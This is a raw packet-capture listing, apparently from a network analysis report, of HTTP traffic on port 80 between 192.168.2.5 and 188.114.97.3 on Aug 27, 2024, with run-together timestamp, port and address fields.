                              Aug 27, 2024 09:48:58.471472025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471482992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471496105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471507072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471517086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471522093 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471527100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471539021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471549988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471561909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471566916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471573114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471579075 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471585989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471623898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471748114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471761942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471772909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471782923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471793890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471800089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471827030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471865892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471885920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471903086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471916914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471929073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471939087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471942902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471950054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471960068 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471961021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471988916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472039938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472089052 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472232103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472243071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472253084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472265959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472279072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472289085 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472294092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472305059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472310066 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472316027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472327948 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472327948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472341061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472353935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472354889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472367048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472393036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472418070 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472664118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472675085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472685099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472696066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472707033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472714901 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472718000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472733021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472733974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472743988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472754955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472755909 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472765923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472778082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472779989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472789049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472814083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472856045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.472924948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472942114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.472994089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.559218884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559235096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559245110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559308052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559318066 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.559319973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559331894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559344053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559377909 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.559501886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559511900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559521914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559531927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559540987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559551954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559561968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559567928 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.559572935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559582949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559607983 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.559618950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.559719086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559730053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559741020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559751034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559761047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.559777021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.559803963 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561211109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561256886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561261892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561266899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561304092 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561341047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561352015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561361074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561371088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561383963 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561408043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561444998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561455965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561501026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561599970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561610937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561619997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561631918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561641932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561647892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561652899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561662912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561666965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561674118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561685085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561688900 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561708927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561875105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561889887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561901093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561909914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561920881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561922073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561933041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561934948 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561949015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561959028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561964989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.561969995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.561978102 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562026024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562195063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562206984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562216043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562227011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562239885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562248945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562251091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562262058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562272072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562277079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562283993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562297106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562314987 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562486887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562499046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562514067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562524080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562529087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562534094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562544107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562555075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562565088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562567949 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562577009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562582970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562591076 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562592030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.562612057 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.562630892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563069105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563079119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563087940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563097954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563107967 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563122034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563133001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563137054 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563143015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563152075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563158989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563163042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563174009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563180923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563184023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563194990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563200951 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563205004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563216925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563222885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563242912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563826084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563837051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563846111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563855886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563860893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563870907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563878059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563889027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563898087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563899040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563908100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563919067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563931942 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563931942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563941002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563950062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.563950062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563960075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563970089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563980103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.563985109 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564012051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564028025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564038992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564048052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564057112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564065933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564070940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564075947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564085007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564097881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564097881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564112902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564116001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564124107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564132929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564135075 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564145088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564153910 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564157009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564167976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564172983 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564177990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564188004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564196110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564198971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.564223051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.564239979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652420998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652435064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652445078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652565002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652578115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652589083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652599096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652611017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652638912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652638912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652683973 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652683973 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652715921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652724028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652738094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652755022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652765036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652769089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652776003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652786016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652796030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652796984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652806997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652815104 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652817965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652829885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.652838945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.652879000 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.653176069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.653186083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.653194904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.653223991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.653249025 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.655144930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655154943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655165911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655193090 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.655293941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655304909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655318975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655329943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655348063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.655379057 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.655512094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655558109 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.655575037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655586004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655622959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.655687094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655697107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655706882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655718088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655734062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.655762911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.655946016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655956030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655966043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655982018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.655992031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656003952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656003952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656016111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656027079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656028032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656037092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656052113 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656073093 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656097889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656107903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656119108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656130075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656146049 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656167984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656219959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656229973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656239033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656250000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656260014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656270981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656275034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656280994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656292915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656297922 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656307936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656312943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656318903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656356096 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656375885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656385899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656395912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656419039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656441927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656454086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656466007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656476021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656492949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656503916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656507969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656513929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656522989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656529903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656574965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.656712055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656722069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656732082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656749010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.656753063 CEST6138380192.168.2.5188.114.97.3
